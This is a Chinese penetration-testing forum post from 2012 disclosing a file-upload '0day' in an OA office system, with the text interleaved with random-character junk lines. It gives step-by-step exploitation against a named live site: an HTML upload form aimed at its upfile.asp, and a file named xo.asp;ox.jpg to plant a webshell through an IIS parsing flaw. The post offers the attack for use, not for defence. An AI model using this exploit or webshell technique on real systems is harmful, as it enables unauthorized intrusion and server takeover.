中国网络渗透测试联盟
标题:
全能OA办公系统0day OA办公系统漏洞 上传漏洞
[打印本页]
作者:
admin
时间:
2012-11-21 13:45
标题:
全能OA办公系统0day OA办公系统漏洞 上传漏洞
全能OA办公系统 上传漏洞
& S* o4 l7 ^" Q+ j l! b+ |
( u5 y7 Y3 W* g/ k
系统介绍:
, X" `( J! n' m v0 i
& C: _5 j- u6 ]" o+ C& U' f
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
8 s$ d+ @$ F# q4 s- v# z$ a
6 i( v7 H, T5 N+ g
主要功能:
6 |- a- ~. K) E# x2 q, Z4 D2 G$ O
公司通告
. K, V+ o. e) T- Z% z
工作计划
& y, _9 e a2 v
通讯助理
8 K. c" _7 e6 i- z0 B( w7 d0 R
客户资源
) T% d- }% s+ _% M+ W. n
我的公文
+ b; D' M7 ~; D, B
公文传阅
/ y$ S1 t& A- e* y- }
公共资源
/ k: a j" L9 [1 J5 N, j
资源预约
! z$ W3 S! m' h+ U- V
今日考勤
$ J# g$ x: t X, B0 S: G
个人计划
0 u4 v& ], O9 j B: @' F+ X& y
个人通讯录
1 K2 f% _+ q2 E$ R8 |
个人基本档案
* g4 p9 K8 e r2 i
未读邮件
4 X- u/ v% p0 m! ?
发邮件
X) N! B6 V# u6 e( F& G
收件夹
. m' a$ \$ C9 ?: f0 H& O. Y7 P9 K
寄件夹
# W! [ z- j: V. `# e
网络硬盘
3 ?/ i; r3 S5 \! l' G
网络会议
8 y9 w& |7 T6 T0 q* _
网络调查
6 l# Q$ h5 \3 n1 H9 k2 o
交流论坛
; {" u& C% m, u9 f* b M, v
$ y3 d" v* C3 X; l
有兴趣测试的朋友可以下源码看看
" X" L; t8 j7 @' U* C5 |) ]9 v
X3 Q7 n* X. z7 K% j5 i( b
源码下载:
8 i7 q( S3 J( q, p! ]
& M2 c' B J; m% U/ Q# }
http://www.mycodes.net/30/4750.htm
: v3 k e" T( B
! r% y4 n, W" v- l a
漏洞介绍:
* w/ g" r p; S7 S d0 W
6 o1 H7 }4 J) N% `- P& o3 s
由upfile.asp上传文件漏洞引起
. a2 Y$ k Q8 B3 t! t8 c
6 v* u% g9 q m. |
测试方法:
+ M+ ~' h c! s( x# G% w, n% N
* n# z* l$ F. p2 Z$ p
使用名小子上传
http://www.itlynn.com/upfile.asp
即可
6 L0 X4 ^% B7 p3 u; T9 ?4 j* M) z
* x1 o4 j# [7 A
如果upfile.asp文件被删除不存在。
8 \6 c4 c+ u0 D4 F
$ h+ D, D, w6 r. P0 J- E
那么可以试着访问
http://www.itlynn.com/upfile/upfile.asp
。
! n& N6 `* c! w" {$ Y4 l* {
\8 e; U1 w. ]4 @; Q
如果存在那么将如下代码保存为upfile.html。
; W( [- c0 s# e: H& L" O4 `- ^3 o
3 H% y* b) Y. J* j A- x
然后将action的参数修改为目标站点的url。例如
http://www.itlynn.com/upfile/upfile.asp
。
6 ^* I( R: m) Z& i) A- I8 c; K
5 ?8 q/ m* w* a3 `4 V
2 V; t5 S8 x+ d( n2 f
& d% s1 F1 N2 h. }5 W
01 <table border='0' align="center" cellpadding="5">
* i- d( F) V; |0 z% P
( S1 ?* @% \# \, T
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
" R5 Z3 `( @8 n. A2 P# L
0 d6 K% F; R+ F' w4 ~% T- \8 }
03 <tr>
W3 m% r% f: |1 U) k X
$ @+ d) [; v' V2 h6 x
04 <td>报错:</td>
: R N& r6 C+ y3 r$ M8 c
# Q" O& Y3 Q0 `
05 <td><input type='radio' name='errnumber' value='0'>
9 T+ _/ y* B3 t: S8 _) I
W4 v5 \+ S. h2 m3 @& c/ l i7 ]
06 自动更名
6 ^+ I7 P# j# M8 w0 c
" h3 L, R# ^$ h# M" K$ F0 }" Z
07 <input type='radio' name='errnumber' value='1' checked>
, \$ x3 m- n5 N n5 X
* I; p: O/ N$ `) k% }: j) ?9 _
08 报错方式
1 k+ U1 X% _% o f4 h. g
5 H" I* B- Z- u1 [+ e
09 <input type='radio' name='errnumber' value='2'>
9 @ _& |1 [! {+ G1 W
6 { {# C+ Q8 L; T7 \
10 直接覆盖</td>
# c( W' E0 j: n" S& M0 R+ Z
8 m2 r. i; E1 O7 r6 p, X
11 </tr>
4 M4 { n' d/ E# e. h
" ]0 L3 u+ t* R3 Y0 h
12 <tr>
; q# b$ \" B% J# t! C; Y
/ A, @. V- u: M8 L4 Q# M; U
13 <td>主题:</td>
& o- h' I( } a; a3 _
, f- x4 z& z8 u8 I
14 <td><input type='text' name='filename' size='30'></td>
/ }+ P6 K1 m6 [( Y: g
5 n4 D/ y' x* b' p* k% F5 @* `
15 </tr>
: Q) D# H+ U7 B) \
w7 ^# ~6 J9 _, P& f2 q6 ^6 \; w
16 <tr>
0 w9 e% g+ D" ?, T, l& ], z% u1 x
; v( o7 |1 `6 N. \
17 <td>文件:</td>
% S1 V' H, } V4 o+ a5 t3 ]
/ b' J7 g: ^+ N# P5 {; M
18 <td><input type="file"name="fruit"size="30"></td>
2 ~ F f$ C$ Z- T1 t8 l
8 o* v+ N* A( x
19 </tr>
: u& s. r1 D2 p- S; d! P
2 h3 y# B5 v4 R; |, j
20 <tr>
' Y9 K0 Z3 H, @2 N
: N+ G \2 X" D4 g! u& P
21 <td valign='top'>简介:</td>
+ O8 u+ K* U2 w/ A+ r/ H
0 v6 j3 L: V* W e7 V0 r e( V; I
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
2 L7 E z6 h; B7 i6 [4 O. X
, W! I( X6 B. k3 l
23 </tr>
! o) v6 J0 o* m0 V0 p( E( k3 `
' j" A! P! |. \+ M1 M
24
$ Z9 F i, s& A! h4 s% i) ]3 T
6 A& B5 @* F2 L
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
& f# [% Y# m. g \8 g& s
" q8 d# F" R9 W) e0 b1 Y0 \/ D
26 </tr>
1 Q8 ?( A( N' m% }- u! _0 ]
& C. N' x0 F+ Q- }% f8 {
27 </form>
. J& w+ D: O1 {% c9 k) z2 _
1 N# k: l4 n& f' A; R2 Z! t
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
/ _+ Y3 d# z) C: j7 ]/ ]
! ~( z$ d" D1 H7 m* k, z
% K7 Y6 J% H1 ^5 |
B5 c- B( o0 L: z# g3 M& a% h1 W
上传成功后,马的路径是:
http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
4 G9 g# q8 S1 A: I T, f$ n, E
# Q' P' \: q' K5 Y2 F
此漏洞需要配合解析漏洞利用。
- M2 A: F: A Q& ~1 s4 ]* B
4 u6 A& F4 T8 B3 b# a+ \: [2 C
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2